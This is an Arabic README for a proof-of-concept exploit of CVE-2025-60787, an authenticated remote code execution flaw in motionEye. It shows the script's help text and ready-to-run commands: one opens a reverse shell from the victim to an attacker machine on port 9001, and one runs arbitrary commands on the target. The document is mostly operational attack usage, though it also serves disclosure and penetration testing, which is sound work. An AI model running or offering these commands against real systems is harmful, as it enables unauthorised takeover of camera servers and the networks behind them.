
PoC لـ CVE-2025-60787 - ثغرة RCE موثّقة في motionEye لجميع الإصدارات حتى 0.43.1b4 (متضمنًا)
PoC لـ CVE-2025-60787 وهي ثغرة RCE موثقة لـ motionEye مع جميع الإصدارات المتأثرة حتى 0.43.1b4 (مشمولة).
هذا PoC آلي للثغرة الموصوفة في هذا المستودع. الشكر لـ prabhatverma47.
يحتوي السكربت على أمرين يستغلان الثغرة. الأول يرسل شل عكسي مباشر يسمى revshell والآخر يسمى command لتنفيذ الأوامر مباشرة باستغلال هذا CVE.
❯ python3 CVE-2025-60787.py -h
usage: CVE-2025-60787.py [-h] {revshell,command} ...
PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x
positional arguments:
{revshell,command} Choose between send a reverse shell or (attempting to) run commands
revshell Attempt to send a reverse shell using CVE-2025-60787 vuln
command Execute a command remotely using CVE-2025-60787 vuln
options:
-h, --help show this help message and exit
استخدم الأمر revshell للحصول على شل. على سبيل المثال:
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001
حيث 10.10.10.10 هي الجهاز الهدف (الجهاز الذي يعمل عليه motionEye)، و 10.10.10.15 هو جهاز المهاجم الخاص بنا، و 9001 هو المنفذ الذي نستمع عليه لاستقبال شل عكسي.
إذا أردنا بدلاً من الشل العكسي تنفيذ أوامر أخرى عن بعد، يمكننا استخدام الخيار command. على سبيل المثال، تنفيذ الأمر ping -c1 10.10.10.15 على الجهاز الضحية:
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'
حيث 10.10.10.10 هو الجهاز الذي يعمل عليه motionEye.
استخدم هذا السكربت دائمًا تحت مسؤوليتك الخاصة.
كن أخلاقيًا (: